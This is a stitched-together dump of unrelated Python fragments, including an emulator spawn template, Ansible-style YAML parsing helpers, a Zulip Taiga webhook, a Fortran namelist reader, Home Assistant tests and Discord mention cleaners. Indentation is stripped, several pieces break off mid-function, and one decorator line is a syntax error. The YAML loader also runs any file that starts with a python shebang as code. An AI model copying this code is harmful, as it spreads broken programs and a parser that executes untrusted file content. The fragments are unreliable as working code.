import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from resources.datatables import FactionStatus
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('rebel_battle_droid')
mobileTemplate.setLevel(83)
mobileTemplate.setDifficulty(Difficulty.ELITE)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(True)
mobileTemplate.setScale(1)
mobileTemplate.setSocialGroup("rebel")
mobileTemplate.setAssistRange(24)
mobileTemplate.setStalker(False)
mobileTemplate.setFaction("rebel")
mobileTemplate.setFactionStatus(FactionStatus.Combatant)
templates = Vector()
templates.add('object/mobile/shared_battle_droid.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/ranged/carbine/shared_carbine_e5.iff', WeaponType.CARBINE, 1.0, 15, 'energy')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('rangedShot')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('battle_droid_rebel', mobileTemplate)
return
raise errors.AnsibleError("expected current_args to be a basestring")
# we use parse_kv to split up the current args into a dictionary
final_args = parse_kv(current_args)
if isinstance(new_args, dict):
final_args.update(new_args)
elif isinstance(new_args, basestring):
new_args_kv = parse_kv(new_args)
final_args.update(new_args_kv)
return serialize_args(final_args)
def parse_yaml(data, path_hint=None):
''' convert a yaml string to a data structure. Also supports JSON, ssssssh!!!'''
stripped_data = data.lstrip()
loaded = None
if stripped_data.startswith("{") or stripped_data.startswith("["):
# since the line starts with { or [ we can infer this is a JSON document.
try:
loaded = json.loads(data)
except ValueError, ve:
if path_hint:
raise errors.AnsibleError(path_hint + ": " + str(ve))
else:
raise errors.AnsibleError(str(ve))
else:
# else this is pretty sure to be a YAML document
loaded = yaml.load(data, Loader=Loader)
return loaded
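# Usage sketch: parse_yaml accepts either JSON or YAML text.
# parse_yaml('{"a": 1}')        -> {'a': 1}   (detected as JSON)
# parse_yaml('a: 1\nb: [2, 3]') -> {'a': 1, 'b': [2, 3]}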
def process_common_errors(msg, probline, column):
replaced = probline.replace(" ","")
if ":{{" in replaced and "}}" in replaced:
msg = msg + """
This one looks easy to fix. YAML thought it was looking for the start of a
hash/dictionary and was confused to see a second "{". Most likely this was
meant to be an ansible template evaluation instead, so we have to give the
parser a small hint that we wanted a string instead. The solution here is to
just quote the entire value.
For instance, if the original line was:
app_path: {{ base_path }}/foo
It should be written as:
app_path: "{{ base_path }}/foo"
"""
return msg
elif len(probline) and len(probline) > 1 and len(probline) > column and probline[column] == ":" and probline.count(':') > 1:
msg = msg + """
This one looks easy to fix. There seems to be an extra unquoted colon in the line
and this is confusing the parser. It was only expecting to find one free
colon. The solution is just add some quotes around the colon, or quote the
entire line after the first colon.
For instance, if the original line was:
copy: src=file.txt dest=/path/filename:with_colon.txt
It can be written as:
copy: src=file.txt dest='/path/filename:with_colon.txt'
Or:
copy: 'src=file.txt dest=/path/filename:with_colon.txt'
"""
return msg
else:
parts = probline.split(":")
if len(parts) > 1:
middle = parts[1].strip()
match = False
unbalanced = False
if middle.startswith("'") and not middle.endswith("'"):
match = True
elif middle.startswith('"') and not middle.endswith('"'):
match = True
if len(middle) > 0 and middle[0] in [ '"', "'" ] and middle[-1] in [ '"', "'" ] and (probline.count("'") > 2 or probline.count('"') > 2):
unbalanced = True
if match:
msg = msg + """
This one looks easy to fix. It seems that there is a value started
with a quote, and the YAML parser is expecting to see the line ended
with the same kind of quote. For instance:
when: "ok" in result.stdout
Could be written as:
when: '"ok" in result.stdout'
or equivalently:
when: "'ok' in result.stdout"
"""
return msg
if unbalanced:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
unbalanced quotes. If starting a value with a quote, make sure the
line ends with the same set of quotes. For instance this arbitrary
example:
foo: "bad" "wolf"
Could be written as:
foo: '"bad" "wolf"'
"""
return msg
return msg
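# Usage sketch: given the offending line and column reported by the YAML
# parser, this appends the most likely hint to the base error message.
# process_common_errors(msg, 'app_path: {{ base_path }}/foo', 10)
# -> msg plus the "quote the entire value" hint above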
def process_yaml_error(exc, data, path=None, show_content=True):
if hasattr(exc, 'problem_mark'):
mark = exc.problem_mark
if show_content:
if mark.line - 1 >= 0:
before_probline = data.split("\n")[mark.line-1]
else:
before_probline = ''
probline = data.split("\n")[mark.line]
arrow = " " * mark.column + "^"
msg = """Syntax Error while loading YAML script, %s
Note: The error may actually appear before this position: line %s, column %s
%s
%s
%s""" % (path, mark.line + 1, mark.column + 1, before_probline, probline, arrow)
unquoted_var = None
if '{{' in probline and '}}' in probline:
if '"{{' not in probline or "'{{" not in probline:
unquoted_var = True
if not unquoted_var:
msg = process_common_errors(msg, probline, mark.column)
else:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
missing quotes. Always quote template expression brackets when they
start a value. For instance:
with_items:
- {{ foo }}
Should be written as:
with_items:
- "{{ foo }}"
"""
else:
# most likely displaying a file with sensitive content,
# so don't show any of the actual lines of yaml just the
# line number itself
msg = """Syntax error while loading YAML script, %s
The error appears to have been on line %s, column %s, but may actually
be before there depending on the exact syntax problem.
""" % (path, mark.line + 1, mark.column + 1)
else:
# No problem markers means we have to throw a generic
# "stuff messed up" type message. Sry bud.
if path:
msg = "Could not parse YAML. Check over %s again." % path
else:
msg = "Could not parse YAML."
raise errors.AnsibleYAMLValidationFailed(msg)
def parse_yaml_from_file(path, vault_password=None):
''' convert a yaml file to a data structure '''
data = None
show_content = True
try:
data = open(path).read()
except IOError:
raise errors.AnsibleError("file could not read: %s" % path)
vault = VaultLib(password=vault_password)
if vault.is_encrypted(data):
# if the file is encrypted and no password was specified,
# the decrypt call would throw an error, but we check first
# since the decrypt function doesn't know the file name
if vault_password is None:
raise errors.AnsibleError("A vault password must be specified to decrypt %s" % path)
data = vault.decrypt(data)
show_content = False
if re.match("#!.*python", data):
result = pybook.run_pybook(path)
else:
try:
result = parse_yaml(data, path_hint=path)
except yaml.YAMLError, exc:
process_yaml_error(exc, data, path, show_content)
if VERBOSITY >= 3:
display("""Structure of file "%s":\n%s\n""" % (path, pprint.pformat(result)), color='yellow')
return result
def parse_kv(args):
''' convert a string of key/value items to a dict '''
options = {}
if args is not None:
try:
vargs = split_args(args)
except ValueError, ve:
if 'no closing quotation' in str(ve).lower():
raise errors.AnsibleError("error parsing argument string, try quoting the entire line.")
else:
raise
for x in vargs:
if "=" in x:
k, v = x.split("=",1)
options[k.strip()] = unquote(v.strip())
return options
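# Usage sketch (split_args/unquote live elsewhere in this module):
# parse_kv("src=a.txt dest='/tmp/b.txt' mode=0644")
# -> {'src': 'a.txt', 'dest': '/tmp/b.txt', 'mode': '0644'}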
def _validate_both_dicts(a, b):
if not (isinstance(a, dict) and isinstance(b, dict)):
raise errors.AnsibleError(
"failed to combine variables, expected dicts but got a '%s' and a '%s'" % (type(a).__name__, type(b).__name__)
)
def merge_hash(a, b):
''' recursively merges hash b into a
keys from b take precedence over keys from a '''
result = {}
# we check here as well as in combine_vars() since this
# function can work recursively with nested dicts
_validate_both_dicts(a, b)
for dicts in a, b:
# next, iterate over b keys and values
for k, v in dicts.iteritems():
# if the result already holds a dict under this key, merge recursively;
# otherwise the later value (from b) simply wins
if k in result and isinstance(result[k], dict):
result[k] = merge_hash(result[k], v)
else:
result[k] = v
return result
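# Usage sketch: keys from b win; nested dicts merge recursively.
# merge_hash({'x': 1, 'sub': {'a': 1}}, {'y': 3, 'sub': {'b': 2}})
# -> {'x': 1, 'y': 3, 'sub': {'a': 1, 'b': 2}}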
- :calendar: - all other events connected to milestones
- :clipboard: - all other events connected to tasks
- :bulb: - all other events connected to issues
*Text formatting*: if there has been a change of a property, the new value should always be in bold; otherwise the
subject of US/task should be in bold.
"""
from __future__ import absolute_import
from typing import Any, Dict, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.http import HttpRequest, HttpResponse
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success, json_error
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile, Client
import ujson
from six.moves import range
@api_key_only_webhook_view('Taiga')
@has_request_variables
def api_taiga_webhook(request, user_profile, client, message=REQ(argument_type='body'),
stream=REQ(default='taiga'), topic=REQ(default='General')):
# type: (HttpRequest, UserProfile, Client, Dict[str, Any], Text, Text) -> HttpResponse
parsed_events = parse_message(message)
content_lines = []
for event in parsed_events:
content_lines.append(generate_content(event) + '\n')
content = "".join(sorted(content_lines))
check_send_message(user_profile, client, 'stream', [stream], topic, content)
return json_success()
templates = {
'userstory': {
'create': u':package: %(user)s created user story **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned user story **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned user story **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned user story **%(subject)s**'
' from %(old)s to %(new)s.',
'points': u':game_die: %(user)s changed estimation of user story **%(subject)s**.',
'blocked': u':lock: %(user)s blocked user story **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked user story **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added user story **%(subject)s** to sprint %(new)s.',
'unset_milestone': u':calendar: %(user)s removed user story **%(subject)s** from sprint %(old)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of user story **%(subject)s** from %(old)s'
' to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of user story **%(subject)s**'
' from %(old)s to %(new)s.',
'closed': u':checkered_flag: %(user)s closed user story **%(subject)s**.',
'reopened': u':package: %(user)s reopened user story **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed user story from %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of user story **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on user story **%(subject)s**.',
'delete': u':x: %(user)s deleted user story **%(subject)s**.'
},
'milestone': {
'create': u':calendar: %(user)s created sprint **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed sprint from %(old)s to **%(new)s**.',
'estimated_start': u':calendar: %(user)s changed estimated start of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'estimated_finish': u':calendar: %(user)s changed estimated finish of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'delete': u':x: %(user)s deleted sprint **%(subject)s**.'
},
'task': {
'create': u':clipboard: %(user)s created task **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned task **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned task **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned task **%(subject)s**'
' from %(old)s to %(new)s.',
'blocked': u':lock: %(user)s blocked task **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked task **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added task **%(subject)s** to sprint %(new)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of task **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of task **%(subject)s**'
' from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed task %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of task **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on task **%(subject)s**.',
'delete': u':x: %(user)s deleted task **%(subject)s**.',
'changed_us': u':clipboard: %(user)s moved task **%(subject)s** from user story %(old)s to %(new)s.'
},
'issue': {
'create': u':bulb: %(user)s created issue **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned issue **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned issue **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_priority': u':rocket: %(user)s changed priority of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_severity': u':warning: %(user)s changed severity of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_type': u':bulb: %(user)s changed type of issue **%(subject)s** from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed issue %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of issue **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on issue **%(subject)s**.',
'delete': u':x: %(user)s deleted issue **%(subject)s**.'
},
}
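# Hedged sketch of the generate_content helper referenced above (its body
# falls outside this excerpt); the parsed event is presumably rendered by
# indexing into the templates dict:
def generate_content(data):
# type: (Mapping[str, Any]) -> Text
template = templates[data['type']][data['event']]
return template % data['values']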
def get_old_and_new_values(change_type, message):
# type: (str, Mapping[str, Any]) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]]]
""" Parses the payload and finds previous and current value of change_type."""
if change_type in ['subject', 'name', 'estimated_finish', 'estimated_start']:
old = message["change"]["diff"][change_type]["from"]
new = message["change"]["diff"][change_type]["to"]
return old, new
try:
old = message["change"]["diff"][change_type]["from"]
except KeyError:
old = None
try:
new = message["change"]["diff"][change_type]["to"]
except KeyError:
new = None
return old, new
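# Usage sketch with a minimal, hypothetical Taiga payload:
# message = {'change': {'diff': {'status': {'from': 'New', 'to': 'In progress'}}}}
# get_old_and_new_values('status', message)      -> ('New', 'In progress')
# get_old_and_new_values('assigned_to', message) -> (None, None)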
def parse_comment(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses the comment to issue, task or US. """
return {
'event': 'commented',
'type': message["type"],
'values': {
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_create_or_delete(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses create or delete event. """
return {
'type': message["type"],
'event': message["action"],
'values':
{
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_change_event(change_type, message):
# type: (str, Mapping[str, Any]) -> Dict[str, Any]
""" Parses change event. """
evt = {} # type: Dict[str, Any]
values = {
'user': get_owner_name(message),
'subject': get_subject(message)
} # type: Dict[str, Any]
if change_type in ["description_diff", "points"]:
event_type = change_type
elif change_type in ["milestone", "assigned_to"]:
old, new = get_old_and_new_values(change_type, message)
from __future__ import absolute_import
from __future__ import unicode_literals
NAMES = [
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
def get_pairs():
for i, name in enumerate(NAMES):
yield(name, str(30 + i))
yield('intense_' + name, str(30 + i) + ';1')
def ansi(code):
return '\033[{0}m'.format(code)
def ansi_color(code, s):
return '{0}{1}{2}'.format(ansi(code), s, ansi(0))
def make_color_fn(code):
return lambda s: ansi_color(code, s)
for (name, code) in get_pairs():
globals()[name] = make_color_fn(code)
def rainbow():
cs = ['cyan', 'yellow', 'green', 'magenta', 'red', 'blue',
'intense_cyan', 'intense_yellow', 'intense_green',
'intense_magenta', 'intense_red', 'intense_blue']
for c in cs:
yield globals()[c]
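# Usage sketch: the get_pairs() loop above injects helpers such as red()
# and intense_cyan() into this module's globals, e.g.
# red('error')        -> '\033[31merror\033[0m'
# intense_blue('hi')  -> '\033[34;1mhi\033[0m'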
"""Classes for Omnivor input file
Copyright (C) 2013 DTU Wind Energy
Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013
Namelist IO: basic functions to read and parse a Fortran file into a Python dictionary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
__author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
__version__ = '$Revision: 1.0 $'[11:-2]
__date__ = '$Date: 2006/09/05 21:16:24 $'
__copyright__ = 'Copyright (c) 2006 RPN'
__license__ = 'LGPL'
Recognizes files of the form:
&namelistname
opt1 = value1
...
/
"""
from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest
import numpy as np
import os.path as path
import sys
import re
import tempfile
import os
__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
"""
Fortran Namelist IO class
Scan a Fortran Namelist file and put Section/Parameters into a dictionary
Write the file back if needed.
"""
def _write(self):
""" Write a file (overrided)
"""
with open(self.filename, 'w') as f:
for nml in self.data :
f.write('&'+nml+'\n')
# Sorting dictionary data (in the same order as it was created, thanks to id)
SortedList = sorted(self.data[nml].items(), key=lambda(k, v): v['id'])
# for param in self.data[nml]:
for param in map(lambda(k,v):k,SortedList):
f.write(param+'='+','.join(self.data[nml][param]['val']))
if len(self.data[nml][param]['com']) >0:
f.write(' !'+self.data[nml][param]['com'])
f.write('\n')
f.write('/\n')
def _read(self):
""" Read the file (overrided)
"""
with open(self.filename, 'r') as f:
data = f.read()
varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
valueInt = re.compile(r'[+-]?[0-9]+')
valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
valueNumber = re.compile(r'\b(([\+\-]?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
spaces = r'[\s\t]*'
quote = re.compile(r"[\s\t]*[\'\"]")
namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")
#split sections/namelists
mynmlfile = {}
mynmlfileRaw = {}
mynmlname = ''
for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
if re.match(namelistname,item):
mynmlname = re.sub(namelistname,r"\1",item)
mynmlfile[mynmlname] = {}
mynmlfileRaw[mynmlname] = []
elif re.match(namlistend,item):
mynmlname = ''
else:
if mynmlname:
mynmlfileRaw[mynmlname].append(item)
#parse param in each section/namelist
for mynmlname in mynmlfile.keys():
#split strings
bb = []
for item in mynmlfileRaw[mynmlname]:
if item[0]!='!':
# discarding lines that starts with a comment
bb.extend(FortranNamelistIO.splitstring(item))
#split comma and =
aa = []
for item in bb:
if not re.match(quote,item):
aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
# aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
else:
aa.append(item)
del(bb)
aa = FortranNamelistIO.clean(aa,cleancomma=1)
myparname = ''
id_cum=0
for item in aa:
if re.search(paramname,item):
#myparname = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
myparname = re.sub(paramname,r"\1",item)
id_cum=id_cum+1
mynmlfile[mynmlname][myparname] = {
'val' : [],
'id' : id_cum,
'com' : ''
}
elif paramname:
# Storing comments
item2=item.split('!')
item=item2[0]
if len(item) > 1 :
mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
if re.match(valueBool,item):
if re.match(valueTrue,item):
mynmlfile[mynmlname][myparname]['val'].append('.true.')
else:
mynmlfile[mynmlname][myparname]['val'].append('.false.')
else:
# item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
mynmlfile[mynmlname][myparname]['val'].append(item.strip())
self.data=mynmlfile
# Accessor and mutator dictionary style
def __getitem__(self, key):
""" Transform the class instance into a dictionary."""
return self.data[key]
def __setitem__(self, key, value):
""" Transform the class instance into a dictionary."""
self.data[key] = value
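# Usage sketch (hypothetical file name; assumes the WEFileIO base class
# reads the file on construction, as the test class below suggests):
# nml = FortranNamelistIO('input.nml')
# nml['mysection']['myparam']['val']  -> list of raw value strings
# nml['mysection']['myparam']['com']  -> trailing '!' comment, if any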
#==== Helper functions for Parsing of files
@staticmethod
def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
"""
Remove leading and trailing blanks, comments/empty lines from a list of strings
mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
commentline: definition of commentline
spacemerge: if <>0, merge/collapse multi space
cleancomma: Remove leading and trailing commas
"""
aa = mystringlist
if cleancomma:
aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
if commentexpr:
aa = [re.sub(commentexpr,"",item).strip() for item in aa]
if spacemerge:
aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) <> 0]
else:
aa = [item.strip() for item in aa if len(item.strip()) <> 0]
return aa
@staticmethod
def splitstring(mystr):
"""
Split a string in a list of strings at quote boundaries
Input: String
Output: list of strings
"""
dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
#remove zero-length items
mystrarr = [item for item in mystrarr if len(item) <> 0]
if len(mystrarr) > 1:
mystrarr2 = []
for item in mystrarr:
mystrarr2.extend(FortranNamelistIO.splitstring(item))
mystrarr = mystrarr2
return mystrarr
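# Quick illustration of splitstring: quoted runs become their own items.
# FortranNamelistIO.splitstring('a = "hello world", b')
# -> ['a = ', '"hello world"', ', b']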
## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
""" Test class for MyFileType class """
test_file = './test/fortran/fortran_namelist.nml'
def test_output_identical(self):
InputFile=FortranNamelistIO(self.test_file)
test_fileout=tempfile.mkstemp()[1]
InputFile.write(test_fileout)
with open(self.test_file, 'r') as f:
data_expected = f.read()
with open(test_fileout, 'r') as f:
data_read = f.read()
try:
self.assertMultiLineEqual(data_read, data_expected)
finally:
os.remove(test_fileout)
def test_duplication(self):
self._test_duplication(FortranNamelistIO, self.test_file)
## Main function ---------------------------------------------------------
if __name__ == '__main__':
unittest.main()
"""Test the National Weather Service (NWS) config flow."""
from unittest.mock import patch
import aiohttp
from homeassistant import config_entries
from homeassistant.components.nws.const import DOMAIN
async def test_form(hass, mock_simple_nws_config):
"""Test we get the form."""
hass.config.latitude = 35
hass.config.longitude = -90
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], {"api_key": "test"}
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "ABC"
assert result2["data"] == {
"api_key": "test",
"latitude": 35,
"longitude": -90,
"station": "ABC",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass, mock_simple_nws_config):
"""Test we handle cannot connect error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = aiohttp.ClientError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_error(hass, mock_simple_nws_config):
"""Test we handle unknown error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = ValueError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_already_configured(hass, mock_simple_nws_config):
"""Test we handle duplicate entries."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert len(mock_setup_entry.mock_calls) == 1
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == 0
def f(x=2):
return x
lis = [1]
dic = {
"x": 2
}
f(1) # call_function
f(*lis) # call_function_var
f(**dic) # call_function_kw
f(*[], **dic) # call_function_var_kw
class C(object): # call_function
def __enter__(self):
x = 1
return x
def __exit__(self, *args, **kwargs):
pass
def fn_dec(*args):
def dec(fn):
return fn
return dec
dec1 = fn_dec("1")
@fn_dec("2") # call_function
@dec1 # call_function
def fw(x):
return x
@fn_dec("2" | ) # call_function
@dec1 # call_function
class D(object):
pass
[a for a in lis] # nothing
{a for a in lis} # call_function
{a: a for a in lis} # call_function
f(a for a in lis) # call_function gen, call_function
with C() as r: # WITH_CLEANUP
pass
assert True # nothing
assert True, "wat" # call_function
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
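# Hedged usage sketch; SystemDSContext and from_numpy come from the systemds
# Python API, and the values here are purely illustrative:
# import numpy as np
# from systemds.context import SystemDSContext
# with SystemDSContext() as sds:
#     y = sds.from_numpy(np.array([[1.0], [0.0], [1.0]]))
#     y_hat = sds.from_numpy(np.array([[1.0], [1.0], [1.0]]))
#     acc = getAccuracy(y, y_hat).compute()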
"""Provides some useful utilities for the Discord bot, mostly to do with cleaning."""
import re
import discord
__all__ = ['clean', 'is_clean']
mass_mention = re.compile('@(everyone|here)')
member_mention = re.compile(r'<@\!?(\d+)>')
role_mention = re.compile(r'<@&(\d+)>')
channel_mention = re.compile(r'<#(\d+)>')
def clean(ctx, text=None, *, mass=True, member=True, role=True, channel=True):
"""Cleans the message of anything specified in the parameters passed."""
if text is None:
text = ctx.message.content
if mass:
cleaned_text = mass_mention.sub(lambda match: '@\N{ZERO WIDTH SPACE}' + match.group(1), text)
if member:
cleaned_text = member_mention.sub(lambda match: clean_member_name(ctx, int(match.group(1))), cleaned_text)
if role:
cleaned_text = role_mention.sub(lambda match: clean_role_name(ctx, int(match.group(1))), cleaned_text)
if channel:
cleaned_text = channel_mention.sub(lambda match: clean_channel_name(ctx, int(match.group(1))), cleaned_text)
return cleaned_text
def is_clean(ctx, text=None):
"""Checks if the message is clean already and doesn't need to be cleaned."""
if text is None:
text = ctx.message.content
return all(regex.search(text) is None for regex in (mass_mention, member_mention, role_mention, channel_mention))
def clean_member_name(ctx, member_id):
"""Cleans a member's name from the message."""
member = ctx.guild.get_member(member_id)
if member is None:
return '<@\N{ZERO WIDTH SPACE}%d>' % member_id
elif is_clean(ctx, member.display_name):
return member.display_name
elif is_clean(ctx, str(member)):
return str(member)
else:
return '<@\N{ZERO WIDTH SPACE}%d>' % member.id
def clean_role_name(ctx, role_id):
"""Cleans role pings from messages."""
role = discord.utils.get(ctx.guild.roles, id=role_id) # Guild.get_role doesn't exist
if role is None:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role_id
elif is_clean(ctx, role.name):
return '@' + role.name
else:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role.id
def clean_channel_name(ctx, channel_id):
"""Cleans channel mentions from messages."""
channel = ctx.guild.get_channel(channel_id)
if channel is None:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel_id
elif is_clean(ctx, channel.name):
return '#' + channel.name
else:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel.id
def pretty_concat(strings, single_suffix='', multi_suffix=''):
"""Concatenates things in a pretty way"""
if len(strings) == 1:
return strings[0] + single_suffix
elif len(strings) == 2:
return '{} and {}{}'.format(*strings, multi_suffix)
else:
return '{}, and {}{}'.format(', '.join(strings[:-1]), strings[-1], multi_suffix)
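# pretty_concat in action:
# pretty_concat(['a'], single_suffix='!')     -> 'a!'
# pretty_concat(['a', 'b'], multi_suffix='.') -> 'a and b.'
# pretty_concat(['a', 'b', 'c'])              -> 'a, b, and c'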
from lib.base import BaseJiraAction
__all__ = [
'TransitionJiraIssueAction'
]
class TransitionJiraIssueAction(BaseJiraAction):
def run(self, issue_key, transition):
result = self._client.transition_issue(issue_key, transition)
return result
## Need to find a library
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Copyright (c) 2014, Raphael Kubo da Costa <rakuco@FreeBSD.org>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
import PyQt4.QtCore
import os
import sys
def get_default_sip_dir():
# This is based on QScintilla's configure.py, and only works for the
